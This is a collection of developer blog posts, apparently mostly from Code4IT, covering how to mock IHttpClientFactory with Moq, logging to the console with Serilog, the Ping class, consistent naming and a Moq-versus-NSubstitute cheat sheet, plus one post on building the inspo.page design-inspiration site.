
  • How to test HttpClientFactory with Moq


    Mocking IHttpClientFactory is hard, but luckily we can use some advanced features of Moq to write better tests.


    When working on any .NET application, one of the most common things you’ll see is using dependency injection to inject an IHttpClientFactory instance into the constructor of a service. And, of course, you should test that service. To write good unit tests, it is a good practice to mock the dependencies to have full control over their behavior. A well-known library to mock dependencies is Moq; integrating it is pretty simple: if you have to mock a dependency of type IMyService, you can create mocks of it by using Mock<IMyService>.

But here comes a problem: mocking IHttpClientFactory is not that simple; just using Mock<IHttpClientFactory> is not enough.

    In this article, we will learn how to mock IHttpClientFactory dependencies, how to define the behavior for HTTP calls, and finally, we will deep dive into the advanced features of Moq that allow us to mock that dependency. Let’s go!

    Introducing the issue

    To fully understand the problem, we need a concrete example.

    The following class implements a service with a method that, given an input string, sends it to a remote client using a DELETE HTTP call:

    public class MyExternalService
    {
        private readonly IHttpClientFactory _httpClientFactory;
    
        public MyExternalService(IHttpClientFactory httpClientFactory)
        {
            _httpClientFactory = httpClientFactory;
        }
    
        public async Task DeleteObject(string objectName)
        {
            string path = $"/objects?name={objectName}";
            var client = _httpClientFactory.CreateClient("ext_service");
    
            var httpResponse = await client.DeleteAsync(path);
    
            httpResponse.EnsureSuccessStatusCode();
        }
    }
    

    The key point to notice is that we are injecting an instance of IHttpClientFactory; we are also creating a new HttpClient every time it’s needed by using _httpClientFactory.CreateClient("ext_service").

As you may know, you should not instantiate a new HttpClient for every call, to avoid the risk of socket exhaustion (see links below).

There is a huge problem with this approach: it’s not easy to test. You cannot simply mock the IHttpClientFactory dependency; you also have to handle the underlying HttpClient and keep track of its internals.

    Of course, we will not use real IHttpClientFactory instances: we don’t want our application to perform real HTTP calls. We need to mock that dependency.

Think of mocked dependencies as movie stunt doubles: you don’t want your main stars to get hurt while performing action scenes. In the same way, you don’t want your application to perform actual operations when running tests.

    Creating mocks is like using stunt doubles for action scenes

    We will use Moq to test the method and check that the HTTP call is correctly adding the objectName variable in the query string.

    How to create mocks of IHttpClientFactory with Moq

Let’s begin with the full code for creating a mocked IHttpClientFactory:

    var handlerMock = new Mock<HttpMessageHandler>(MockBehavior.Strict);
    
    HttpResponseMessage result = new HttpResponseMessage();
    
    handlerMock
        .Protected()
        .Setup<Task<HttpResponseMessage>>(
            "SendAsync",
            ItExpr.IsAny<HttpRequestMessage>(),
            ItExpr.IsAny<CancellationToken>()
        )
        .ReturnsAsync(result)
        .Verifiable();
    
    var httpClient = new HttpClient(handlerMock.Object) {
            BaseAddress = new Uri("https://www.code4it.dev/")
        };
    
    var mockHttpClientFactory = new Mock<IHttpClientFactory>();
    
    mockHttpClientFactory.Setup(_ => _.CreateClient("ext_service")).Returns(httpClient);
    
var service = new MyExternalService(mockHttpClientFactory.Object);
    

    A lot of stuff is going on, right?

    Let’s break it down to fully understand what all those statements mean.

    Mocking HttpMessageHandler

    The first instruction we meet is

    var handlerMock = new Mock<HttpMessageHandler>(MockBehavior.Strict);
    

    What does it mean?

    HttpMessageHandler is the fundamental part of every HTTP request in .NET: it performs a SendAsync call to the specified endpoint with all the info defined in a HttpRequestMessage object passed as a parameter.

    Since we are interested in what happens to the HttpMessageHandler, we need to mock it and store the result in a variable.

Have you noticed that MockBehavior.Strict? This is an optional parameter that makes the mock throw an exception when it doesn’t have a corresponding setup. To try it, remove that argument from the constructor and comment out the handlerMock.Setup() part: when you run the tests, you’ll receive an error of type Moq.MockException.

    Next step: defining the behavior of the mocked HttpMessageHandler

    Defining the behavior of HttpMessageHandler

    Now we have to define what happens when we use the handlerMock object in any HTTP operation:

    HttpResponseMessage result = new HttpResponseMessage();
    
    handlerMock
        .Protected()
        .Setup<Task<HttpResponseMessage>>(
            "SendAsync",
            ItExpr.IsAny<HttpRequestMessage>(),
            ItExpr.IsAny<CancellationToken>()
        )
        .ReturnsAsync(result)
        .Verifiable();
    

    The first thing we meet is that Protected(). Why?

    To fully understand why we need it, and what is the meaning of the next operations, we need to have a look at the definition of HttpMessageHandler:

    // Summary: A base type for HTTP message handlers.
    public abstract class HttpMessageHandler : IDisposable
    {
        /// Other stuff here...
    
        // Summary: Send an HTTP request as an asynchronous operation.
        protected internal abstract Task<HttpResponseMessage> SendAsync(
            HttpRequestMessage request,
            CancellationToken cancellationToken);
    }
    

    From this snippet, we can see that we have a method, SendAsync, which accepts an HttpRequestMessage object and a CancellationToken, and which is the one that deals with HTTP requests. But this method is protected. Therefore we need to use Protected() to access the protected methods of the HttpMessageHandler class, and we must set them up by using the method name and the parameters in the Setup method.

    With Protected() you can access protected members

    Two details to notice, then:

    • We specify the method to set up by using its name as a string: “SendAsync”
    • To say that we don’t care about the actual values of the parameters, we use ItExpr instead of It because we are dealing with the setup of a protected member.

If SendAsync were a public method, we would have done something like this:

    handlerMock
        .Setup(_ => _.SendAsync(
            It.IsAny<HttpRequestMessage>(), It.IsAny<CancellationToken>())
        );
    

But, since it is a protected method, we need to use the approach shown above.

Then, we define that the call to SendAsync returns an object of type HttpResponseMessage: here we don’t care about the content of the response, so we can leave it as-is, without further customization.
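If the method under test inspected the response, we could shape the mocked HttpResponseMessage before returning it. Here’s a minimal sketch – the status code and JSON body are illustrative values, not something the DeleteObject method above actually requires:

HttpResponseMessage result = new HttpResponseMessage
{
    // Illustrative values: DeleteObject only calls EnsureSuccessStatusCode,
    // so any 2xx status code would work here.
    StatusCode = System.Net.HttpStatusCode.OK,
    Content = new StringContent("{\"deleted\":true}", System.Text.Encoding.UTF8, "application/json")
};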

    Creating HttpClient

    Now that we have defined the behavior of the HttpMessageHandler object, we can pass it to the HttpClient constructor to create a new instance of HttpClient that acts as we need.

    var httpClient = new HttpClient(handlerMock.Object) {
            BaseAddress = new Uri("https://www.code4it.dev/")
        };
    

Here I’ve set the BaseAddress property to a valid URI to avoid null references when performing the HTTP call. You can even use a non-existent URL: the important thing is that the URL must be well-formed.

    Configuring the IHttpClientFactory instance

    We are finally ready to create the IHttpClientFactory!

    var mockHttpClientFactory = new Mock<IHttpClientFactory>();
    
    mockHttpClientFactory.Setup(_ => _.CreateClient("ext_service")).Returns(httpClient);
    
    var service = new MyExternalService(mockHttpClientFactory.Object);
    

    So, we create the Mock of IHttpClientFactory and define the instance of HttpClient that will be returned when calling CreateClient("ext_service"). Finally, we’re passing the instance of IHttpClientFactory to the constructor of MyExternalService.

    How to verify the calls performed by IHttpClientFactory

    Now, suppose that in our test we’ve performed the operation under test.

    // setup IHttpClientFactory
    await service.DeleteObject("my-name");
    

    How can we check if the HttpClient actually called an endpoint with “my-name” in the query string? As before, let’s look at the whole code, and then let’s analyze every part of it.

    // verify that the query string contains "my-name"
    
    handlerMock.Protected()
     .Verify(
        "SendAsync",
        Times.Exactly(1), // we expected a single external request
        ItExpr.Is<HttpRequestMessage>(req =>
        req.RequestUri.Query.Contains("my-name") // Query string contains my-name
        ),
        ItExpr.IsAny<CancellationToken>()
        );
    

    Accessing the protected instance

    As we’ve already seen, the object that performs the HTTP operation is the HttpMessageHandler, which here we’ve mocked and stored in the handlerMock variable.

    Then we need to verify what happened when calling the SendAsync method, which is a protected method; thus we use Protected to access that member.

    Checking the query string

    The core part of our assertion is this:

    ItExpr.Is<HttpRequestMessage>(req =>
    req.RequestUri.Query.Contains("my-name") // Query string contains my-name
    ),
    

    Again, we are accessing a protected member, so we need to use ItExpr instead of It.

The Is<HttpRequestMessage> method accepts a Func<HttpRequestMessage, bool> that we can use to check whether the HttpRequestMessage under test – in our case, we named that variable req – matches the specified predicate. If so, the verification passes.
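For instance, a stricter predicate could also check the HTTP method and path used by DeleteObject. Here’s a minimal sketch based on the service defined at the beginning of the article:

handlerMock.Protected()
    .Verify(
        "SendAsync",
        Times.Exactly(1),
        ItExpr.Is<HttpRequestMessage>(req =>
            req.Method == HttpMethod.Delete              // DeleteObject sends a DELETE request
            && req.RequestUri.AbsolutePath == "/objects" // to the /objects path
            && req.RequestUri.Query.Contains("my-name")  // with the name in the query string
        ),
        ItExpr.IsAny<CancellationToken>()
    );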

    Refactoring the code

    Imagine having to repeat that code for every test method in your class – what a mess!

    So we can refactor it: first of all, we can move the HttpMessageHandler mock to the SetUp method:

    [SetUp]
    public void Setup()
    {
        this.handlerMock = new Mock<HttpMessageHandler>(MockBehavior.Strict);
    
        HttpResponseMessage result = new HttpResponseMessage();
    
        this.handlerMock
        .Protected()
        .Setup<Task<HttpResponseMessage>>(
            "SendAsync",
            ItExpr.IsAny<HttpRequestMessage>(),
            ItExpr.IsAny<CancellationToken>()
        )
    .Returns(Task.FromResult(result))
    .Verifiable();
    
        var httpClient = new HttpClient(handlerMock.Object) {
            BaseAddress = new Uri("https://www.code4it.dev/")
            };
    
        var mockHttpClientFactory = new Mock<IHttpClientFactory>();
    
        mockHttpClientFactory.Setup(_ => _.CreateClient("ext_service")).Returns(httpClient);
    
        this.service = new MyExternalService(mockHttpClientFactory.Object);
    }
    

    and keep a reference to handlerMock and service in some private members.

    Then, we can move the assertion part to a different method, maybe to an extension method:

    public static void Verify(this Mock<HttpMessageHandler> mock, Func<HttpRequestMessage, bool> match)
    {
        mock.Protected().Verify(
            "SendAsync",
            Times.Exactly(1), // we expected a single external request
        ItExpr.Is<HttpRequestMessage>(req => match(req)),
            ItExpr.IsAny<CancellationToken>()
        );
    }
    

    So that our test can be simplified to just a bunch of lines:

    [Test]
    public async Task Method_Should_ReturnSomething_When_Condition()
    {
        //Arrange occurs in the SetUp phase
    
        //Act
        await service.DeleteObject("my-name");
    
        //Assert
        handlerMock.Verify(r => r.RequestUri.Query.Contains("my-name"));
    }
    

    Further readings

    🔗 Example repository | GitHub

    🔗 Why we need HttpClientFactory | Microsoft Docs

    🔗 HttpMessageHandler class | Microsoft Docs

    🔗 Mock objects with static, complex data by using Manifest resources | Code4IT

    🔗 Moq documentation | GitHub

    🔗 How you can create extension methods in C# | Code4IT

    Wrapping up

    In this article, we’ve seen how tricky it can be to test services that rely on IHttpClientFactory instances. Luckily, we can rely on tools like Moq to mock the dependencies and have full control over the behavior of those dependencies.

    Mocking IHttpClientFactory is hard, I know. But here we’ve found a way to overcome those difficulties and make our tests easy to write and to understand.

    There are lots of NuGet packages out there that help us mock that dependency: do you use any of them? What is your favourite, and why?

    Happy coding!

    🐧




  • The Journey Behind inspo.page: A Better Way to Collect Web Design Inspiration

    The Journey Behind inspo.page: A Better Way to Collect Web Design Inspiration



    Have you ever landed on a website and thought, “Wow, this is absolutely beautiful”? You know that feeling when every little animation flows perfectly, when clicking a button feels satisfying, when the whole experience just feels premium.

    That’s exactly what happened to me a few years ago, and it changed everything.

    The Moment Everything Clicked

    I was browsing the web when I stumbled across one of those websites. You know the type where every micro-animation has been crafted with care, where every transition feels intentional. It wasn’t just pretty; it made me feel something.

    That’s when I got hooked on web design.

    But here’s the thing: I wanted to create websites like that too. I wanted to capture that same magic, those same emotions. So I started doing what any curious designer does. I began collecting inspiration.

    Spotting a Gap

    At first, I used the usual inspiration websites. They’re fantastic for discovering beautiful sites and getting that creative spark. But I noticed something: they showed you the whole website, which is great for overall inspiration.

    The thing is, sometimes I’d get obsessed with just one specific detail. Maybe it was a button animation, or how an accordion opened, or a really smooth page transition. I’d bookmark the entire site, but then later I’d spend ages trying to find that one perfect element again.

    I started thinking there might be room for something more specific. Something where you could find inspiration at the component level, not just the full-site level.

    Starting Small

So I started building my own library. Whenever I saw something cool (a smooth page transition, an elegant pricing section, a slick navigation animation), I’d record it and save it with really specific tags like “card,” “hero section,” or “page transition.”

    Early versions of my local library I had on Eagle

    Real, useful categories that actually helped me find what I needed later. I did this for years. It became my secret weapon for client projects and personal work.

    From Personal Tool to Public Resource

    After a few years of building this personal collection, I had a thought: “If this helps me so much, maybe other designers and developers could use it too.”

    That’s when I decided I should share this with the world. But I didn’t want to just dump my library online and call it a day. It was really important to me that people could filter stuff easily, that it would be intuitive, and that it would work well on both mobile and desktop. I wanted it to look good and actually be useful.

Early version of inspo.page; the filters were not yet sticky at the bottom

    That’s how inspo.page was born.

    How It Actually Works

    The idea behind inspo.page is simple: instead of broad categories, I built three specific filter systems:

    • What – All the different components and layouts. Looking for card designs? Different types of lists? Different types of modals? It’s all here.
    • Where – Sections of websites. Need inspiration for a hero section? A pricing page? Social proof section? Filter by where it appears on a website.
    • Motion – Everything related to movement. Page transitions, parallax effects, hover animations.

    The magic happens when you combine these filters. Want to see card animations specifically for pricing sections? Or parallax effects used for presenting services? Just stack the filters and get exactly what you’re looking for.

    The Technical Side

On the technical side, I’m using Astro and Sanity. Because I’m sometimes lazy and really wanted a project that’s future-proof, I made it as simple as possible for me to curate inspiration.

That’s why I came up with this automation system where I just hit record and that’s it. It automatically grabs the URL, creates different video versions, compresses everything, hosts it on Bunny.net, and then sends it to the CMS so I just have to tag it and publish.

    Tagging system inside Sanity

    I really wanted to find a system that makes it as easy as possible for me to do what I want to do because I knew if there was too much resistance, I’d eventually stop doing it.

    The Hardest Part

    You’d probably think the hardest part was all the technical stuff like setting up automations and managing video uploads. But honestly, that was the easy part.

    The real challenge was figuring out how to organize everything so people could actually find what they’re looking for.

    I must have redesigned the entire tagging system at least 10 times. Every time I thought I had it figured out, I’d realize it was either way too complicated or way too vague. Too many specific tags and people get overwhelmed scrolling through endless options. Too few broad categories and everything just gets lumped together uselessly.

    It’s this weird balancing act. You need enough categories to be helpful, but not so many that people give up before they even start filtering. And the categories have to make sense to everyone, not just me.

    I think I’ve got a system now that works pretty well, but it might change in the future. If users tell me there’s a better way to organize things, I’m really all ears because honestly, it’s a difficult problem to solve. Even though I have something that seems to work now, there might be a much better approach out there.

    The Human Touch in an AI World

    Here’s something I think about a lot: AI can build a decent-looking website in minutes now. Seriously, it’s pretty impressive.

    But there’s still something missing. AI can handle layouts and basic styling, but it can’t nail the human stuff yet. Things like the timing of a hover effect, the weight of a transition, or knowing exactly how a micro-interaction should feel. That’s pure taste and intuition.

    Those tiny details are what make websites feel alive instead of just functional. And in a world where anyone can generate a website in 5 minutes, those details are becoming more valuable than ever.

    That’s exactly where inspo.page comes in. It helps you find inspiration for the things that separate good websites from unforgettable ones.

    What’s Next

    Every week, I’m adding more inspiration to the platform. I’m not trying to build the biggest collection out there, just something genuinely useful. If I can help a few designers and developers find that perfect animation a little bit faster, then I’m happy.

    Want to check it out? Head over to inspo.page and see if you can find your next favorite interaction. You can filter by specific components (like cards, buttons, modals, etc.), website sections (hero, pricing, etc.), or motion patterns (parallax, page transitions, you name it).

    And if you stumble across a website with some really nice animations or micro-interactions, feel free to share it using the feedback button (top right) on the site. I’m always on the lookout for inspiration pieces that have that special touch. Can’t promise I’ll add everything, but I definitely check out what people send.

    Hope you find something that sparks your next great design!




  • use the same name for the same concept | Code4IT



    As I always say, naming things is hard. We’ve already talked about this in a previous article.

By creating a simple and coherent dictionary, you give your classes better names, because you are representing the same idea with the same name. This improves code readability and searchability. Also, by simply looking at the names of your classes, you can grasp their meaning.

    Say that we have 3 objects that perform similar operations: they download some content from external sources.

    class YouTubeDownloader {    }
    
    class TwitterDownloadManager {    }
    
    class FacebookDownloadHandler {    }
    

Here we are using 3 different words for the same concept: Downloader, DownloadManager, DownloadHandler. Why??

Because of that, if you want to find all the similar classes, you can’t even search for “Downloader” in your IDE.

    The solution? Use the same name to indicate the same concept!

    class YouTubeDownloader {    }
    
    class TwitterDownloader {    }
    
    class FacebookDownloader {    }
    

    It’s as simple as that! Just a small change can drastically improve the readability and usability of your code!

So, consider this kind of small issue too when reviewing PRs.

    Conclusion

A common dictionary helps to understand the code without misunderstandings. Of course, this tip does not refer only to class names, but to variables too. Avoid using synonyms for objects (e.g., video and clip). Instead of synonyms, use more specific names (YouTubeVideo instead of Video).
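A minimal sketch of the same idea (the Vimeo class is just an illustrative addition):

// Avoid synonyms for the same concept:
class Video { }
class Clip { } // same concept, different name

// Prefer one name, made more specific when needed:
class YouTubeVideo { }
class VimeoVideo { }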

    Any other ideas?

    👉 Let’s discuss it on Twitter or on the comment section below!

    🐧






  • How to log to Console with .NET Core and Serilog | Code4IT


Serilog is a popular logging library for .NET projects. In this article, we will learn how to integrate it into a .NET API project and write the logs to the Console.


    Having meaningful logs is crucial for any application: without logs, we would not be able to see if errors occur, what’s the status of the application, if there are strange behaviors that should worry us, and so on.

    To define a good logging strategy, we need two parts, equally important: adding logs to our code and analyzing the data produced by our logs.

    In this article, we will see how to add Serilog, a popular logger library, to our .NET projects: we will learn how to configure it to print the logs on a Console.

    Why logging on console

    I can guess what you’re thinking:

    why should we write logs on Console? We should store them somewhere, to analyze them!

    And… you’d be right!

    But still, printing logs on Console can be useful in many ways.

    First of all, by printing on Console you can check that the logging is actually working, and you haven’t missed a configuration.

    Then, writing on Console is great when debugging locally: just spin up your application, run the code you need, and check what happened on the logs; in this way you can understand the internal state of the application, which warnings and errors occurred, and more.

Lastly, because of an odd strategy that I’ve seen implemented in many projects: print the logs to the Console, add an agent that reads them and stores them in memory, and then send all the logs to the destination platform at once; in this way, you’ll perform fewer HTTP requests against those platforms, saving money and avoiding the connection limits of the destination platform.

    Now that we have good reasons to log on Console, well… let’s do it!

    Adding Serilog on Program class

    For this article, we will add Serilog logs to a simple .NET API project.

    Create a new API project – you know, the one with the WeatherForecast controller.

    Then, navigate to the Program class: by default, it should look like this:

    public class Program
    {
        public static void Main(string[] args)
        {
            CreateHostBuilder(args).Build().Run();
        }
    
        public static IHostBuilder CreateHostBuilder(string[] args) =>
            Host.CreateDefaultBuilder(args)
            .ConfigureWebHostDefaults(webBuilder =>
            {
                webBuilder.UseStartup<Startup>();
            });
    }
    

    There are no references to any logger, and, of course, to Serilog.

So the first thing to do is to install it: via NuGet, install Serilog.AspNetCore and Serilog.Extensions.Logging. The first one allows you to add Serilog to an ASP.NET project, while the second one allows you to use the native .NET logger in the code with all the capabilities provided by Serilog.

    Then, we need to add the logger to our project:

    public class Program
    {
        public static void Main(string[] args)
        {
    +        Log.Logger = new LoggerConfiguration()
    +                .CreateLogger();
    
            CreateHostBuilder(args).Build().Run();
        }
    
        public static IHostBuilder CreateHostBuilder(string[] args) =>
            Host.CreateDefaultBuilder(args)
    +        .UseSerilog((hostingContext, loggerConfiguration) =>
    +                    loggerConfiguration.ReadFrom.Configuration(hostingContext.Configuration))
                .ConfigureWebHostDefaults(webBuilder =>
                {
                    webBuilder.UseStartup<Startup>();
                });
    }
    

    There are two snippets to understand:

    Log.Logger = new LoggerConfiguration().CreateLogger();
    

    creates a new logger with the specified configurations (in our case, we use the default values), and then assigns the newly created logger to the globally-shared logger Log.Logger.

    Log.Logger lives in the Serilog namespace, so you have to add it to the using list.
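In practice, that means adding this at the top of the Program file:

using Serilog; // brings Log and LoggerConfiguration into scope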

    Then, we have this second part:

    .UseSerilog((hostingContext, loggerConfiguration) =>
            loggerConfiguration.ReadFrom.Configuration(hostingContext.Configuration)
        )
    

    This snippet defines where to get the Serilog configurations (in this case, from the same place used by the hosting context), and then sets Serilog as the logging provider.

    Inject the logger into constructors

Since we have bound Serilog to the native .NET logger – the one coming from Microsoft.Extensions.Logging – we can use the native logger everywhere in the project.

    Add a dependency to ILogger<T> in your constructor, where T is the name of the class itself:

    public class WeatherForecastController : ControllerBase
    {
    
        private readonly ILogger<WeatherForecastController> _logger;
    
        public WeatherForecastController(ILogger<WeatherForecastController> logger)
        {
            _logger = logger;
        }
    }
    

In this way, you can use the different logging levels and Structured Data (see links below) to add more info:

    _logger.LogInformation("Getting random items. There are {AvailableItems} possible values", Summaries.Count());
    
    _logger.LogWarning("This is a warning");
    
    try
    {
        throw new ArgumentException();
    }
    catch (Exception ex)
    {
        _logger.LogError(ex, "And this is an error");
    }
    

    Update the AppSettings file

But that’s not enough. We haven’t yet told Serilog that our logs should be printed to the Console. To do that, we must update the appsettings.json file and add some new configurations.

    "Serilog": {
        "Using": [ "Serilog.Sinks.Console" ],
        "MinimumLevel": {
            "Default": "Verbose",
            "Override": {
                "Microsoft": "Warning",
                "Microsoft.AspNetCore": "Warning",
                "System": "Error"
            }
        },
        "WriteTo": [
            {
            "Name": "Async",
            "Args": {
                "configure": [
                {
                    "Name": "Console",
                    "Args": {
                        "formatter": "Serilog.Formatting.Compact.RenderedCompactJsonFormatter, Serilog.Formatting.Compact"
                    }
                }
                ]
            }
            }
        ]
    }
    

    As usual, let’s break it down.

    The first thing to notice is the root of the JSON section: Serilog. This value is the default when defining the configuration values for Serilog (remember the loggerConfiguration.ReadFrom.Configuration(hostingContext.Configuration)? It binds the settings automagically!)

    The Using section defines the types of Sinks that will be used. A Sink is just the destination of the logs. So, just download the Serilog.Sinks.Console NuGet package and add that value to the Using array to use the Console as a Sink.

Then, we have the MinimumLevel object: it defines the minimum level of logs that will be taken into consideration. Here the default value is Verbose, but you’ll probably want it to be Warning in your production environment: in this way, all the logs with a level lower than Warning will be ignored.

Lastly, we have the WriteTo section, which defines the exact configurations of the sinks. Notice the Async value: it wraps the inner sinks so that log writing happens on a background worker instead of blocking the application. So, after you’ve installed the Serilog.Sinks.Async NuGet package, you must add the Async value to that object. And then you can configure the different Sinks: here I’m adding a simple JSON formatter to the Console Sink.

    Run the application

    We’re finally ready to run our application.

    Just run it with the usual IIS profile and… nothing happens! Where is the Console??

    With IIS you cannot see any Console, since it simply does not exist – if the application runs as a web application, we don’t need the Console.

    So, you have to change the running profile and select the name of your application (in my case, SerilogLoggingOnConsole).

    Use the correct running profile

    Then you can run the application, navigate to an endpoint, and see the logs!

    Serilog logs as plain text

    But I don’t like how logs are displayed, too many details!

    Let me add a theme: in the AppSettings file, I can add a theme configuration:

    "Args": {
        "configure": [
        {
            "Name": "Console",
            "Args": {
    +        "theme": "Serilog.Sinks.SystemConsole.Themes.AnsiConsoleTheme::Code, Serilog.Sinks.Console",
            "formatter": "Serilog.Formatting.Compact.RenderedCompactJsonFormatter, Serilog.Formatting.Compact"
            }
        }
        ]
    }
    

    This makes Serilog show the logs with a different shape:

    Serilog logs with a simple theme

So, just by updating the AppSettings file, you can fine-tune the behavior and the output of the logger. In this way, you can customize your Release pipelines to update the AppSettings file and define custom properties for every deployment environment.

    Further reading

    If you want to learn more about the different topics discussed in this article:

    🔗 Serilog Structured Data | Code4IT

    🔗 Serilog Console Sink | GitHub

    🔗 How to integrate Serilog and Seq | Code4IT

    Wrapping up

    In this article, we’ve seen how to integrate Serilog in a .NET application to print the logs on the application Console.

    Time to recap the key points:

    • install the Serilog, Serilog.AspNetCore, and Serilog.Extensions.Logging NuGet packages to integrate the basic functionalities of Serilog
    • download the Serilog.Sinks.Console and Serilog.Sinks.Async NuGet packages to use the Console as a destination of your logs
    • update the Program class to specify that the application must use Serilog
    • use ILogger<T> instead of Serilog.ILogger
    • define the settings in the appsettings.json file instead of directly in the code

    Finally, if you want to see the full example, here’s the GitHub repository used for this article

    Happy coding!

    🐧




  • C# Tip: use the Ping class instead of an HttpClient to ping an endpoint

    C# Tip: use the Ping class instead of an HttpClient to ping an endpoint



    What if you wanted to see if a remote website is up and running?

    Probably, the first thing that may come to your mind is to use a common C# class: HttpClient. But it may cause you some trouble.

    There is another way to ping an endpoint: using the Ping class.

Why not use HttpClient

    Say that you need to know if the host at code4it.dev is live. With HttpClient you might use something like this:

    async Task Main()
    {
        var url = "https://code4it.dev";
    
        var isUp = await IsWebsiteUp_Get(url);
    
        Console.WriteLine("The website is {0}", isUp ? "up" : "down");
    }
    
    private async Task<bool> IsWebsiteUp_Get(string url)
    {
        var httpClient = new HttpClient(); // yes, I know, I should use HttpClientFactory!
        var httpResponse = await httpClient.GetAsync(url);
        return httpResponse.IsSuccessStatusCode;
    }
    

There are some possible issues with this approach: what if there is no resource available at the root? You will have to define a specific path. And what happens if the defined resource is under authentication? IsWebsiteUp_Get will always return false, even when the site is correctly up.

Also, it is possible that the endpoint does not accept GET requests. So, we can send a HEAD request instead:

    private async Task<bool> IsWebsiteUp_Head(string url)
    {
        var httpClient = new HttpClient();
        HttpRequestMessage request = new HttpRequestMessage
        {
            RequestUri = new Uri(url),
            Method = HttpMethod.Head // Not GET, but HEAD
        };
        var result = await httpClient.SendAsync(request);
        return result.IsSuccessStatusCode;
    }
    

    We have the same issues described before, but at least we are not bound to a specific HTTP verb.

So, we need to find another way.

    How to use Ping

    By using the Ping class, we can get rid of those checks and evaluate the status of the Host, not of a specific resource.

    private async Task<bool> IsWebsiteUp_Ping(string url)
    {
        Ping ping = new Ping();
        var hostName = new Uri(url).Host;
    
        PingReply result = await ping.SendPingAsync(hostName);
        return result.Status == IPStatus.Success;
    }
    

The Ping class lives in the System.Net.NetworkInformation namespace and allows you to perform the same operations as the ping command you usually run from the command line.
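As a side note, SendPingAsync also has overloads that accept a timeout, and it throws a PingException when, for instance, the host name cannot be resolved. Here’s a hedged variation of the method above – the 3000 ms timeout is just an illustrative value:

private async Task<bool> IsWebsiteUp_PingWithTimeout(string url)
{
    try
    {
        Ping ping = new Ping();
        var hostName = new Uri(url).Host;

        // 3000 ms is an illustrative timeout, not a recommended value
        PingReply result = await ping.SendPingAsync(hostName, 3000);
        return result.Status == IPStatus.Success;
    }
    catch (PingException)
    {
        // Thrown, for example, when the host name cannot be resolved
        return false;
    }
}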

    Conclusion

    We’ve seen why you should use Ping instead of HttpClient to perform a ping-like operation.

    There’s more than this: head to this more complete article to learn more.

    👉 Let’s discuss it on Twitter or on the comment section below.

    🐧






  • syntax cheat sheet | Code4IT


Moq and NSubstitute are two of the most used libraries to mock dependencies in your unit tests. How do they differ? How can we move from one library to the other?


    When writing Unit Tests, you usually want to mock dependencies. In this way, you can define the behavior of those dependencies, and have full control of the system under test.

    For .NET applications, two of the most used mocking libraries are Moq and NSubstitute. They allow you to create and customize the behavior of the services injected into your classes. Even though they have similar functionalities, their syntax is slightly different.

    In this article, we will learn how the two libraries implement the most used functionalities; in this way, you can easily move from one to another if needed.

    A real-ish example

    As usual, let’s use a real example.

    For this article, I’ve created a dummy class, StringsWorker, that does nothing but call another service, IStringUtility.

    public class StringsWorker
    {
        private readonly IStringUtility _stringUtility;
    
        public StringsWorker(IStringUtility stringUtility)
            => _stringUtility = stringUtility;
    
        public string[] TransformArray(string[] items)
            => _stringUtility.TransformAll(items);
    
        public string[] TransformSingleItems(string[] items)
            => items.Select(i => _stringUtility.Transform(i)).ToArray();
    
        public string TransformString(string originalString)
            => _stringUtility.Transform(originalString);
    }
    

    To test the StringsWorker class, we will mock its only dependency, IStringUtility. This means that we won’t use a concrete class that implements IStringUtility, but rather we will use Moq and NSubstitute to mock it, defining its behavior and simulating real method calls.

Of course, to use the two libraries, you have to install them in each test project.

    How to define mocked dependencies

    The first thing to do is to instantiate a new mock.

    With Moq, you create a new instance of Mock<IStringUtility>, and then inject its Object property into the StringsWorker constructor:

    private Mock<IStringUtility> moqMock;
    private StringsWorker sut;
    
    public MoqTests()
    {
        moqMock = new Mock<IStringUtility>();
        sut = new StringsWorker(moqMock.Object);
    }
    

    With NSubstitute, instead, you declare it with Substitute.For<IStringUtility>() – which returns an IStringUtility, not wrapped in any class – and then you inject it into the StringsWorker constructor:

    private IStringUtility nSubsMock;
    private StringsWorker sut;
    
    public NSubstituteTests()
    {
        nSubsMock = Substitute.For<IStringUtility>();
        sut = new StringsWorker(nSubsMock);
    }
    

    Now we can customize moqMock and nSubsMock to add behaviors and verify the calls to those dependencies.

Define method result for a specific input value: the Returns() method

    Say that we want to customize our dependency so that, every time we pass “ciao” as a parameter to the Transform method, it returns “hello”.

    With Moq we use a combination of Setup and Returns.

    moqMock.Setup(_ => _.Transform("ciao")).Returns("hello");
    

    With NSubstitute we don’t use Setup, but we directly call Returns.

    nSubsMock.Transform("ciao").Returns("hello");
    

    Define method result regardless of the input value: It.IsAny() vs Arg.Any()

    Now we don’t care about the actual value passed to the Transform method: we want that, regardless of its value, the method always returns “hello”.

    With Moq, we use It.IsAny<T>() and specify the type of T:

    moqMock.Setup(_ => _.Transform(It.IsAny<string>())).Returns("hello");
    

    With NSubstitute, we use Arg.Any<T>():

    nSubsMock.Transform(Arg.Any<string>()).Returns("hello");
    

    Define method result based on a filter on the input: It.Is() vs Arg.Is()

    Say that we want to return a specific result only when a condition on the input parameter is met.

    For example, every time we pass a string that starts with “IT” to the Transform method, it must return “ciao”.

    With Moq, we use It.Is<T>(func) and we pass an expression as an input.

    moqMock.Setup(_ => _.Transform(It.Is<string>(s => s.StartsWith("IT")))).Returns("ciao");
    

    Similarly, with NSubstitute, we use Arg.Is<T>(func).

    nSubsMock.Transform(Arg.Is<string>(s => s.StartsWith("IT"))).Returns("ciao");
    

    Small trivia: for NSubstitute, the filter is of type Expression<Predicate<T>>, while for Moq it is of type Expression<Func<TValue, bool>>: don’t worry, you can write them in the same way!

    Throwing exceptions

Since you should test not only the happy paths but also those where an error occurs, you should write tests in which the injected service throws an exception, and verify that the exception is handled correctly.

    With both libraries, you can throw a generic exception by specifying its type:

    //Moq
    moqMock.Setup(_ => _.TransformAll(null)).Throws<ArgumentException>();
    
    //NSubstitute
    nSubsMock.TransformAll(null).Throws<ArgumentException>();
    

    You can also throw a specific exception instance – maybe because you want to add an error message:

    var myException = new ArgumentException("My message");
    
    //Moq
    moqMock.Setup(_ => _.TransformAll(null)).Throws(myException);
    
    //NSubstitute
    nSubsMock.TransformAll(null).Throws(myException);
    

    If you don’t want to handle that exception, but you want to propagate it up, you can verify it in this way:

    Assert.Throws<ArgumentException>(() => sut.TransformArray(null));
    

    Verify received calls: Verify() vs Received()

    Sometimes, to understand if the code follows the execution paths as expected, you might want to verify that a method has been called with some parameters.

    To verify it, you can use the Verify method on Moq.

    moqMock.Verify(_ => _.Transform("hello"));
    

    Or, if you use NSubstitute, you can use the Received method.

    nSubsMock.Received().Transform("hello");
    

Similarly to what we’ve seen before, you can use It.IsAny, It.Is, Arg.Any, and Arg.Is to verify some properties of the parameters passed as input.
